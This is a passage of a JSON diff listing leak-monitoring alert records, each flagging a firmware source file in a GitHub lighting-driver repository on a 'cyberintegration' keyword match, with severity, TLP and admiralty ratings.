"46263a0e8543c3175e88cfb952feef77958e53dc", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Drivers/EepromHandler/EepromHandler.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Drivers/EepromHandler/EepromHandler.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "bfb9458a904b3ea4678e5b4bab830cf7465b268f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Drivers/ManchesterCodec/ManchesterCodec.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Drivers/ManchesterCodec/ManchesterCodec.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f28470e0347408c6d0685216469977d28e53424c", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Drivers/ManchesterCodec/ManchesterCodec.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Drivers/ManchesterCodec/ManchesterCodec.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c5135779e4588be9194eb3071df4995dbedf33c1", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Drivers/ManchesterCodec/ManchesterCodec_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Drivers/ManchesterCodec/ManchesterCodec_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c44d8ea280f030c7362c70017508cb85ccc06493", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/DriversConfig/EepromHandler/EepromHandler_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/DriversConfig/EepromHandler/EepromHandler_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "975e59dd47c018657eb4485ab657ead8b26aa7ca", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/DriversConfig/ManchesterCodec/ManchesterCodec_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/DriversConfig/ManchesterCodec/ManchesterCodec_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "3e94a9678391f553e474fa9b0eccb23cb90e8119", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/DriversConfig/ManchesterCodec/ManchesterCodec_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/DriversConfig/ManchesterCodec/ManchesterCodec_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "9e6bf52a33c7a082acf383899af13d8f5ccef8ff", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/DriversConfig/ManchesterCodec/ManchesterCodec_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/DriversConfig/ManchesterCodec/ManchesterCodec_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "4c17b93006a28fbdd11c08f6414917f3ba6cd239", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Clock/Clock.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Clock/Clock.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "03201ac767aec006a655436c3eafb23851ffd278", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Clock/Clock.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Clock/Clock.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "87be0468bcd0e9cd0d64fa437d9c81568d12e1f8", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Clock/Clock_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Clock/Clock_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "9b85a966fad22a4381a23c5969a32f7bee3b3d87", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/DAC/Dac.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/DAC/Dac.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "1e32591e9ce43d29533952ee0ed4e6d86e7229cd", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/DAC/Dac.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/DAC/Dac.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f2ed48312c0ac906ef9bb88b709ba744a15dd534", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/DAC/Dac_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/DAC/Dac_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "2594cfc267fb69cba8616f8495ed5cb9fca33a8b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Event/Event.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Event/Event.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "2ec1a197969971fc073fe834a03844dac415ff60", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Event/Event.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Event/Event.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "1a20c1e212e4e2020e86bc2979ead2969b57be26", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Event/Event_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Event/Event_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "89b65948485f8d1f576bef18f5a158eee70d45f1", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/GPIO/Gpio.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/GPIO/Gpio.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "03563a4a63afa79c73f4d3c0eb90410b7135a5cb", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/GPIO/Gpio.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/GPIO/Gpio.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "b942402e4a72a5ed96bc1c247886bf3431142f88", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/GPIO/Gpio_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/GPIO/Gpio_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "ff1a9f0c737f8350268dd076797c54ab767f4f94", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/I2C/I2c.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/I2C/I2c.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "db3aecb29f911dd5f594b2ab5f65b564905028a7", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/I2C/I2c.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/I2C/I2c.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "21df44f8a39983be5e00aa47044a9f5474f0e775", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/I2C/I2c_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/I2C/I2c_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "550cd0d1903f330f985d7793d857657c20ce3663", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Interrupt/Interrupt.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Interrupt/Interrupt.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "634285cb5efe4560e7e888d3d227839339fb43b3", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Interrupt/Interrupt.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Interrupt/Interrupt.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "b4d7646beb83eccb0fc54e3d0c6724bc2eea548b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/PowerManager/PowerManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/PowerManager/PowerManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "12d7224e305ed4e044163aeb74437190cf407caf", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/PowerManager/PowerManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/PowerManager/PowerManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "9052514163ce57fe81a87536084cfa683d05f725", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/PowerManager/PowerManager_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/PowerManager/PowerManager_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "37c492846a666c4511e87b6407f3fb5a5937270e", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/SystemTick/SystemTick.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/SystemTick/SystemTick.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "88db0c983d1e0aa98d07310d4bb70c1459768226", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/SystemTick/SystemTick.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/SystemTick/SystemTick.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "b95c8fde520d08601f8fddd38de83bf6abc4f83f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/SystemTick/SystemTick_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/SystemTick/SystemTick_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "5398f6ff7e98cbade03b5166d242087aff77833c", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Timers/Timers.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, 